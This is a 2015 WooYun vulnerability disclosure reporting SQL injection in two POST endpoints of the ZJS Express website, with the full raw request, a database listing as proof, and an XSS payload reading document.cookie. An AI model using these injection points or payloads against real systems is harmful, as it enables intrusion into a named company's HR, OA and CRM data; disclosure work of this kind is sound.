当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111924

漏洞标题:宅急送官网注入漏洞涉及E2、OA、招聘等多数据库

相关厂商:zjs.com.cn

漏洞作者: 路人甲

提交时间:2015-05-04 16:26

修复时间:2015-05-09 16:28

公开时间:2015-05-09 16:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入

详细说明:

官网两个地方没过滤post数据形成注入,分别在

http://www.zjs.com.cn/ws_hr/ws_recruitment_index.aspx


http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx


POST /ws_news/ws_news_newssearch.aspx HTTP/1.1
Host: www.zjs.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.zjs.com.cn/ws_news/ws_news_newssearch.aspx
Cookie: ASP.NET_SessionId=jbilzrvrru35gxft3lxcc0e1; BIGipServerwww_pool=209783306.20992.0000
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 10325
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE5NTg3MDMxOTYPZBYCZg9kFgICAw9kFgQCAQ9kFgJmDxYCHglpbm5lcmh0bWwFxCA8ZGl2IGNsYXNzPSJuYXYiPg0KIDxkaXYgY2xhc3M9InRhYmxlIj4NCjx1bCBjbGFzcz0iY3VycmVudCI%2BDQo8bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy56anMuY29tLmNuIj48Yj7pppbpobU8L2I%2BPCEtLVtpZiBJRSA3XT48IS0tPjwvYT48IS0tPCFbZW5kaWZdLS0%2BIDwhLS1baWYgbHRlIElFIDZdPjx0YWJsZT48dHI%2BPHRkPjwhW2VuZGlmXS0tPg0KPGRpdiBjbGFzcz0ic2VsZWN0X3N1YiBzaG93Ij4NCjx1bCBjbGFzcz0ic3ViIj4NCjwvdWw%2BDQo8L2Rpdj4NCjwhLS1baWYgbHRlIElFIDZdPjwvdGQ%2BPC90cj48L3RhYmxlPjwvYT48IVtlbmRpZl0tLT4NCjwvbGk%2BDQo8L3VsPjx1bCBjbGFzcz0ic2VsZWN0Ij4NCjxsaT48YSBocmVmPScuLi9XU19TZXJ2aWNlL1dTX1NlcnZpY2VfY29tbWVuLmFzcHg%2FaWQ9Mic%2BPGI%2B5Li76JCl5Lqn5ZOBPC9iPjwhLS1baWYgSUUgN10%2BPCEtLT48L2E%2BPCEtLTwhW2VuZGlmXS0tPg0KPCEtLVtpZiBsdGUgSUUgNl0%2BPHRhYmxlPjx0cj48dGQ%2BPCFbZW5kaWZdLS0%2BDQo8ZGl2IGNsYXNzPSJzZWxlY3Rfc3ViIj4NCjx1bCBjbGFzcz0ic3ViIj4NCjxsaT48YSBocmVmPScuLi9XU19TZXJ2aWNlL1dTX1NlcnZpY2VfY29tbWVuLmFzcHg%2FaWQ9Mic%2B5Lqn5ZOB5L2T57O7PC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfU2VydmljZS9XU19TZXJ2aWNlX2VsZWN0cmljaXR5LmFzcHg%2FaWQ9Mic%2B55S15ZWG5b%2Br6YCSPC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfU2VydmljZS9XU19TZXJ2aWNlX1Byb1Byb2R1Y3RzXzQuYXNweD9pZD0yJz7kuJPkuJrkuqflk4E8L2E%2BPC9saT4NCjxsaT48YSBocmVmPScuLi9XU19TZXJ2aWNlL1dTX1NlcnZpY2VfUHJvLmFzcHg%2FaWQ9Mic%2B6aG555uu5pyN5YqhPC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfU2VydmljZS9XU19TZXJ2aWNlX0NPRC5hc3B4P2lkPTInPuS7o%2BaUtui0p%2BasvjwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX1NlcnZpY2UvV1NfU2VydmljZV9Qcm9Qcm9kdWN0cy5hc3B4P2lkPTInPuS7k%2BmFjeS4gOS9kzwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX1NlcnZpY2UvV1NfU2VydmljZV9TYWZldHlfR3VpZGUuYXNweD9pZD0yJz7kv53pmankv53ku7c8L2E%2BPC9saT4NCjxsaT48YSBocmVmPScuLi9XU19TZXJ2aWNlL1dTX1NlcnZpY2VfUUEuYXNweD9pZD0yJz7luLjop4Hpl67popg8L2E%2BPC9saT4NCjwvdWw%2BDQo8L2Rpdj4NCjwhLS1baWYgbHRlIElFIDZdPjwvdGQ%2BPC90cj48L3RhYmxlPjwvYT48IVtlbmRpZl0tLT4NCjwvbGk%2BDQo8L3VsPg0KPHVsIGNsYXNzPSJzZWxlY3QiPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX01hcmtldC9XU19NYXJrZXRfYWN0aXZpdHlfMjAxMzEwMTguYXNweD9pZD0zJz48Yj7luILlnLrmjqjlub88L2I%2BPCEtLVtpZiBJRSA3XT48IS0tPjwvYT48IS0tPCFbZW5kaWZdLS0%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48dGFibGU%2BPHRyPjx0ZD48IVtlbmRpZl0tLT4NCjxkaXYgY2xhc3M9InNlbGVjdF9zdWIiPg0KPHVsIGNsYXNzPSJzdWIiPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX01hcmtldC9XU19NYXJrZXRfY2xpZW50LmFzcHg%2FaWQ9Myc%2B5ZCI5L2c5a6i5oi3PC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfTWFya2V0L1dTX01hcmtldF9hY3Rpdml0eV8yMDEzMTAxOC5hc3B4P2lkPTMnPuS%2Fg%2BmUgOa0u%2BWKqDwvYT48L2xpPg0KPGxpPjxhIGhyZWY9JyAuLi9XU19CdXNpbmVzcy9XU19Qcm9kdWN0U3BlZWRlcy5hc3B4P2lkPTMnPuS6p%2BWTgeaPkOmAnzwvYT48L2xpPg0KPGxpPjxhIGhyZWY9JyAuLi9XU19CdXNpbmVzcy9XU19CdXNpbmVzc19XWEN1c3RvbWVyLmFzcHg%2FaWQ9Myc%2B5b6u5L%2Bh5o6o5bm%2FPC9hPjwvbGk%2BDQo8L3VsPg0KPC9kaXY%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48L3RkPjwvdHI%2BPC90YWJsZT48L2E%2BPCFbZW5kaWZdLS0%2BDQo8L2xpPg0KPC91bD4NCjx1bCBjbGFzcz0ic2VsZWN0Ij4NCjxsaT48YSBocmVmPScuLi9XU19sZWFndWUvV1NfbGVhZ3VlX25vdGljZS5hc3B4P2lkPTQnPjxiPue9kee7nOaLm%2BWVhjwvYj48IS0tW2lmIElFIDddPjwhLS0%2BPC9hPjwhLS08IVtlbmRpZl0tLT4NCjwhLS1baWYgbHRlIElFIDZdPjx0YWJsZT48dHI%2BPHRkPjwhW2VuZGlmXS0tPg0KPGRpdiBjbGFzcz0ic2VsZWN0X3N1YiI%2BDQo8dWwgY2xhc3M9InN1YiI%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfbGVhZ3VlL1dTX2xlYWd1ZV9ub3RpY2UuYXNweD9pZD00Jz7nvZHnu5zmi5vllYblhazlkYo8L2E%2BPC9saT4NCjxsaT48YSBocmVmPScuLi9XU19sZWFndWUvV1NfbGVhZ3VlX2luZGV4LmFzcHg%2FaWQ9NCc%2B5Yqg55uf5oub5ZWG6aG755%2BlPC9hPjwvbGk%2BDQo8L3VsPg0KPC9kaXY%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48L3RkPjwvdHI%2BPC90YWJsZT48L2E%2BPCFbZW5kaWZdLS0%2BDQo8L2xpPg0KPC91bD4NCjx1bCBjbGFzcz0ic2VsZWN0Ij4NCjxsaT48YSBocmVmPScuLi9XU19CdXNpbmVzcy9XU19CdXNpbmVzc19Hb29kc1RyYWNrLmFzcHg%2FaWQ9Nic%2BPGI%2B572R5LiK5pyN5YqhPC9iPjwhLS1baWYgSUUgN10%2BPCEtLT48L2E%2BPCEtLTwhW2VuZGlmXS0tPg0KPCEtLVtpZiBsdGUgSUUgNl0%2BPHRhYmxlPjx0cj48dGQ%2BPCFbZW5kaWZdLS0%2BDQo8ZGl2IGNsYXNzPSJzZWxlY3Rfc3ViIj4NCjx1bCBjbGFzcz0ic3ViIj4NCjxsaT48YSBocmVmPScuLi9XU19CdXNpbmVzcy9XU19CdXNpbmVzc19Hb29kc1RyYWNrLmFzcHg%2FaWQ9Nic%2B6LSn54mp5p%2Bl6K%2BiPC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfQnVzaW5lc3MvV1NfQnVzaW5lc3NfcHJpY2VfaW50ZXJuYWwuYXNweD9pZD02Jz7ku7fmoLzmn6Xor6I8L2E%2BPC9saT4NCjxsaT48YSBocmVmPScNCgkJCS4uL1dTX0J1c2luZXNzL1dTX0J1c3NpbmVzc19DaXR5QXJlYV8zLmFzcHg%2FaWQ9Ng0KCQknPuWPlua0vuWMuuWfnzwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jw0KCQkJLi4vV1NfQnVzaW5lc3MvV1NfYnVzaW5lc3NfcGFja2FnaW5nLmFzcHg%2FaWQ9Ng0KCQknPuWMheijheafpeivojwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jw0KCQkJLi4vV1NfQnVzaW5lc3MvV1NfQnVzaW5lc3NfQ29udHJhYmFuZF8xLmFzcHg%2FaWQ9Ng0KCQknPuemgei%2FkOWTgeafpeivojwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX0J1c2luZXNzL1dTX0J1c2luZXNzX3B1cmNoYXNlLmFzcHg%2FaWQ9Nic%2B6YeH6LSt55m76ZmGPC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfTWFya2V0L1dTX01hcmtldF9hY3Rpdml0eV8zLmFzcHg%2FaWQ9Nic%2B6Ieq5Yqp5a6i5oi356uvPC9hPjwvbGk%2BDQo8L3VsPg0KPC9kaXY%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48L3RkPjwvdHI%2BPC90YWJsZT48L2E%2BPCFbZW5kaWZdLS0%2BDQo8L2xpPg0KPC91bD4NCjx1bCBjbGFzcz0ic2VsZWN0Ij4NCjxsaT48YSBocmVmPScuLi9XU19BYm91dHVzL1dTX0Fib3V0VXNfaW5kZXguYXNweD9pZD03Jz48Yj7lhbPkuo7lroXmgKXpgIE8L2I%2BPCEtLVtpZiBJRSA3XT48IS0tPjwvYT48IS0tPCFbZW5kaWZdLS0%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48dGFibGU%2BPHRyPjx0ZD48IVtlbmRpZl0tLT4NCjxkaXYgY2xhc3M9InNlbGVjdF9zdWIiPg0KPHVsIGNsYXNzPSJzdWIiPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX0Fib3V0dXMvV1NfQWJvdXRVc19pbmRleC5hc3B4P2lkPTcnPuWFrOWPuOeugOS7izwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX0Fib3V0dXMvV1NfQWJvdXRVc19jdWx0dXJlLmFzcHg%2FaWQ9Nyc%2B5paH5YyW55CG5b%2B1PC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfQWJvdXR1cy9XU19BYm91dFVzX3Jlc291cmNlLmFzcHg%2FaWQ9Nyc%2B6LWE5rqQ5LyY5Yq%2FPC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfQWJvdXR1cy9XU19BYm91dFVzX3ByZWRvbWluYW5jZS5hc3B4P2lkPTcnPuiOt%2BW%2Bl%2BiNo%2BiqiTwvYT48L2xpPg0KPGxpPjxhIGhyZWY9Jy4uL1dTX0Fib3V0dXMvV1NfQWJvdXRVU19kdXR5LmFzcHg%2FaWQ9Nyc%2B56S%2B5Lya6LSj5Lu7PC9hPjwvbGk%2BDQo8bGk%2BPGEgaHJlZj0nLi4vV1NfQWJvdXR1cy9XU19BYm91dFVTX3N0YWZmLmFzcHg%2FaWQ9Nyc%2B5ZGY5bel5pWF5LqLPC9hPjwvbGk%2BDQo8L3VsPg0KPC9kaXY%2BDQo8IS0tW2lmIGx0ZSBJRSA2XT48L3RkPjwvdHI%2BPC90YWJsZT48L2E%2BPCFbZW5kaWZdLS0%2BDQo8L2xpPg0KPC91bD4NCjwvZGl2Pg0KPC9kaXY%2BDQpkAgMPZBYKAgEPZBYCZg88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgVkFgpmD2QWAmYPFQGAATxhIGNsYXNzPSJoaWdobGlnaHQiIGhyZWY9Ii9uNTk0LmFzcHgiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i572R54K55bu66K6%2B5oOF5Ya15pyA5paw5pWw5o2uIj7nvZHngrnlu7rorr7mg4XlhrXmnIDmlrDmlbDmja48L2E%2BZAIBD2QWAmYPFQGNATxhIGNsYXNzPSJoaWdobGlnaHQiIGhyZWY9Ii9uNTk4LmFzcHgiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i5ZG85Y%2Br5Lit5b%2BD5omT6YCa55O26aKI77yM5aKe6LWE5omp5a65Ij7lkbzlj6vkuK3lv4PmiZPpgJrnk7bpoojvvIzlop4uLi4uPC9hPmQCAg9kFgJmDxUBkwE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjgyOC5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IuWFs%2BS6jumDqOWIhue6v%2Bi3r%2BS6p%2BWTgeaXtumZkOiwg%2BaVtOeahOmAmuefpSI%2B5YWz5LqO6YOo5YiG57q%2F6Lev5Lqn5ZOB5pe26ZmQLi4uLjwvYT5kAgMPZBYCZg8VAW48YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjU5NS5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IumZhui%2FkOePrei9puWkp%2BaPkOmAnyI%2B6ZmG6L%2BQ54%2Bt6L2m5aSn5o%2BQ6YCfPC9hPmQCBA9kFgJmDxUBhwE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjU5Ny5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IuaWsOW3peS9nOWNleWcqOWFqOWbveato%2BW8j%2BWQr%2BeUqCI%2B5paw5bel5L2c5Y2V5Zyo5YWo5Zu95q2j5byP5ZCvLi4uLjwvYT5kAgkPPCsADQEADxYEHgtfIURhdGFCb3VuZGcfAgIKZBYCZg9kFhYCAQ9kFgJmD2QWAmYPFQSBATxhIGNsYXNzPSJoaWdobGlnaHQiIGhyZWY9Ii9uMTExNC5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IumZiOS4nOWNh%2BiRo%2BS6i%2BmVv%2BaWsOW5tOi0uuivjSI%2B6ZmI5Lic5Y2H6JGj5LqL6ZW%2F5paw5bm06LS66K%2BNPC9hPg7lhazlj7jliqjmgIEgIAgyMDE1LzEvNQUxMDk3M2QCAg9kFgJmD2QWAmYPFQSzATxhIGNsYXNzPSJoaWdobGlnaHQiIGhyZWY9Ii9uMTExMy5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IuaQuuaJi%2BaWsOS8meS8tCAg6ZOG5a6a5paw5oiY55WlICDlroXmgKXpgIHlho3lh7rlj5HvvIEiPuaQuuaJi%2BaWsOS8meS8tCAg6ZOG5a6a5paw5oiY55WlICDlroXmgKXpgIHlho3lh7rlj5HvvIE8L2E%2BDuWFrOWPuOWKqOaAgSAgCjIwMTQvMTAvMjIFMTQwMzdkAgMPZBYCZg9kFgJmDxUEnwE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjExMTIuYXNweCIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSLlroXmgKXpgIHljY7ljJfliIbmi6jphY3pgIHln7rlnLDlt6XnqIvlvIDlt6UiPuWuheaApemAgeWNjuWMl%2BWIhuaLqOmFjemAgeWfuuWcsOW3peeoi%2BW8gOW3pTwvYT4O5YWs5Y%2B45Yqo5oCBICAJMjAxNC85LzkgBTEzNTQzZAIED2QWAmYPZBYCZg8VBLEBPGEgY2xhc3M9ImhpZ2hsaWdodCIgaHJlZj0iL24xMTExLmFzcHgiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i6amw5o%2B055Sf5ZG977yM5LqR5Y2X5YiG5YWs5Y%2B45pit6YCa6bKB55S45oqX6ZyH5pWR54G%2BIj7pqbDmj7TnlJ%2Flkb3vvIzkupHljZfliIblhazlj7jmmK3pgJrpsoHnlLjmipfpnIfmlZHngb48L2E%2BDuWFrOWPuOWKqOaAgSAgCjIwMTQvOC8yOCAENzEzN2QCBQ9kFgJmD2QWAmYPFQSNATxhIGNsYXNzPSJoaWdobGlnaHQiIGhyZWY9Ii9uMTExMC5hc3B4IiB0YXJnZXQ9Il9ibGFuayIgdGl0bGU9IuKAnOaOoui3r%2BiAheKAneeOi%2BmdmeadpeWIsOWuheaApemAgSI%2B4oCc5o6i6Lev6ICF4oCd546L6Z2Z5p2l5Yiw5a6F5oCl6YCBPC9hPg7lhazlj7jliqjmgIEgIAoyMDE0LzgvMjggBTEzODcxZAIGD2QWAmYPZBYCZg8VBJkBPGEgY2xhc3M9ImhpZ2hsaWdodCIgaHJlZj0iL24xMTA3LmFzcHgiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i5a6F5oCl6YCB5bm05Lit5Lya6K6u56Gu56uL5paw5ZOB54mM5oiY55WlIj7lroXmgKXpgIHlubTkuK3kvJrorq7noa7nq4vmlrDlk4HniYzmiJjnlaU8L2E%2BDuWFrOWPuOWKqOaAgSAgCDIwMTQvOC81BTEyNDk1ZAIHD2QWAmYPZBYCZg8VBLEBPGEgY2xhc3M9ImhpZ2hsaWdodCIgaHJlZj0iL24xMTA2LmFzcHgiIHRhcmdldD0iX2JsYW5rIiB0aXRsZT0i6IiM5bCW5LiK55qE5b%2Br6YCS5ZCv5Yqo77yM6I2U5p6d44CB6IqS5p6c562J5L2g5ZOB5bCdIj7oiIzlsJbkuIrnmoTlv6vpgJLlkK%2FliqjvvIzojZTmnp3jgIHoipLmnpznrYnkvaDlk4HlsJ08L2E%2BDuWFrOWPuOWKqOaAgSAgCjIwMTQvNi8yNyAFMTAxNTdkAggPZBYCZg9kFgJmDxUEgQE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjExMDQuYXNweCIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSIyMDE0IuagoeWbree7j%2Ba1jiLljbPlsIblkK%2FliqgiPjIwMTQi5qCh5Zut57uP5rWOIuWNs%2BWwhuWQr%2BWKqDwvYT4O5YWs5Y%2B45Yqo5oCBICAJMjAxNC81LzI4BDkwMzhkAgkPZBYCZg9kFgJmDxUEnwE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjExMDMuYXNweCIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSLpmYjmmL7lrp3okaPkuovplb%2FlnKjljJfkuqznianotYTlrabpmaLmjojor74iPumZiOaYvuWuneiRo%2BS6i%2BmVv%2BWcqOWMl%2BS6rOeJqei1hOWtpumZouaOiOivvjwvYT4O5YWs5Y%2B45Yqo5oCBICAJMjAxNC81LzI4BDU5MTVkAgoPZBYCZg9kFgJmDxUEjwE8YSBjbGFzcz0iaGlnaGxpZ2h0IiBocmVmPSIvbjExMDIuYXNweCIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSI05pyI5LuT6YWN5aKe6ZW%2F77yM6LSo6YeP5YaN5Yib5paw6auYIj405pyI5LuT6YWN5aKe6ZW%2F77yM6LSo6YeP5YaN5Yib5paw6auYPC9hPg7lhazlj7jliqjmgIEgIAkyMDE0LzUvMjgENDM3MmQCCw8PFgIeB1Zpc2libGVoZGQCEw8PFgIeBFRleHQFATFkZAIVDw8WAh8FBQI5NWRkAhcPDxYCHwUFCeWFsTk1MOadoWRkGAEFGGN0bDAwJENvbnRlbnQxJEdyaWRWaWV3MQ88KwAKAQgCAWSOrt62WK8Y76JArPLVlrdyCjNV5g%3D%3D&__EVENTVALIDATION=%2FwEWDQLh3aXyAgKD1s3zAwK8rPPPCAK%2FrPPPCAK%2BrPPPCAK5rPPPCALY9uzICQLI4ZbTDQK6norlBgK9uoDiCQLojOyfCwKS8cv0DQKs6LuvC5uheiLMP5doJdPulzys%2F%2BzmTvb9&ctl00%24Content1%24SKey=111&ctl00%24Content1%24condition=2&ctl00%24Content1%24Search=%CB%D1+%CB%F7&ctl00%24Content1%24GoPage=


附送一个post型的xss,不容易利用也需要注意一下

http://www.zjs.com.cn/ws_business/ws_internal_previewarea.aspx
SearchArea=<script>alert(document.cookie)</script>

漏洞证明:

[*] ASPState
[*] E2
[*] E2_PUB
[*] Forum
[*] IMS_CRM
[*] IMS_HR
[*] IMS_HR_BAK
[*] IMS_LOG
[*] IMS_OA
[*] IMS_PDA
[*] IMS_PUB
[*] IMS_VOTE
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ZJSOA


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-09 16:28

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-04 19:59 | ../../ ( 路人 | Rank:2 漏洞数:2 )

    黑狗 我知道是你!

  2. 2015-05-04 21:55 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    黑狗 我知道是你!

  3. 2015-05-05 01:50 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    黑狗 我知道是你!